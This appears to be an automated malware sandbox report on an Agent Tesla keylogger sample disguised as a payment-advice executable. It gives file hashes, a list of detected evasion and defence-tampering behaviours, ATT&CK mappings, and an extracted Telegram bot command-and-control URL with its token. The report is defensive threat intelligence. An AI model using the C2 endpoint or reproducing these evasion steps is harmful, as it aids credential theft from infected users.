Overview

overview

10

Static

static

3

Ach_Paymen...01.exe

windows7-x64

10

Ach_Paymen...01.exe

windows10-2004-x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    23052024_1347_22052024_Ach_Payment_Advice01.gz

  • Size

    612KB

  • Sample

    240523-q3yfksdb8y

  • MD5

    adf375448796e4d3f80067a25fe89f46

  • SHA1

    cfc575914ca0ebe94abf5d89722f6fbfaa9e1ee9

  • SHA256

    c992f916c0381e40b3849ad77534f0bb944e4e42283793fd7ac06e245cd43cef

  • SHA512

    e98fa14ef9a55f05bc8f48cab97397d732c12154b12caaef0d8fd0e39d8fff5b22f865eb9f9ade221ac64840011f2bbf2361042be9fbabe2c7f398dd976c3dc3

  • SSDEEP

    12288:RJCt63Yngjh38jpvNO1ShvoOJ/gf5jb0qy3QQ5tcGgU0fOYeWiKp6cgxA:G63cihMpFutYjtPEU0m3KIcH

Score
10/10
agentteslaevasionexecutionkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

C2

https://api.telegram.org/bot7116470912:AAFcUeHH1656vYbBtccMjQVal4iMak99ZmA/

Targets

    • Target

      Ach_Payment_Advice01.exe

    • Size

      689KB

    • MD5

      eeb0a5f2f2e765bbe937e595ddd0650a

    • SHA1

      2a5127e5fdf921547b4ec39e964682469573e1f6

    • SHA256

      2869686380724afd713bbefc58c9aceabd90692e27d9de7af96e748b3066d8e9

    • SHA512

      46f36ddb5d6dc37ac4d1d0388c87971933e8f8fae7de89d54483b5a900365c786b859b9b7fbd7f721a03ac03025ce800f5ee3ebcb67aa22442d8df1853456ee8

    • SSDEEP

      12288:c5h2Xp96Wtlc5ingN/JuXdH7O18x3UObHgf5jFuq4XQM5taSw40fgYYMiwp68kxU:c5UXfvtlc5yC/adbChYjl9c40oRwI81

    Score
    10/10
    agentteslaevasionexecutionkeyloggerspywarestealertrojan

    • AgentTesla

      Agent Tesla is a remote access tool (RAT) written in visual basic.

      keyloggertrojanstealerspywareagenttesla

    • UAC bypass

      evasiontrojan

    • Windows security bypass

      evasiontrojan

    • Looks for VirtualBox Guest Additions in registry

      evasion

    • Command and Scripting Interpreter: PowerShell

      Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

      execution

    • Looks for VMWare Tools registry key

      evasion

    • Checks BIOS information in registry

      BIOS information is often read in order to detect sandboxing environments.

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Windows security modification

      evasiontrojan

    • Checks whether UAC is enabled

      evasiontrojan

    • Looks up external IP address via web service

      Uses a legitimate IP lookup service to find the infected system's external IP.

    • Maps connected drives based on registry

      Disk information is often read in order to detect sandboxing environments.

    • Suspicious use of SetThreadContext

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

1
T1059

PowerShell

1
T1059.001

Persistence

Privilege Escalation

Abuse Elevation Control Mechanism

1
T1548

Bypass User Account Control

1
T1548.002

Defense Evasion

Abuse Elevation Control Mechanism

1
T1548

Bypass User Account Control

1
T1548.002

Impair Defenses

3
T1562

Disable or Modify Tools

3
T1562.001

Modify Registry

4
T1112

Virtualization/Sandbox Evasion

2
T1497

Credential Access

Discovery

Query Registry

5
T1012

Virtualization/Sandbox Evasion

2
T1497

System Information Discovery

5
T1082

Peripheral Device Discovery

1
T1120

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Resource Development

Reconnaissance

Tasks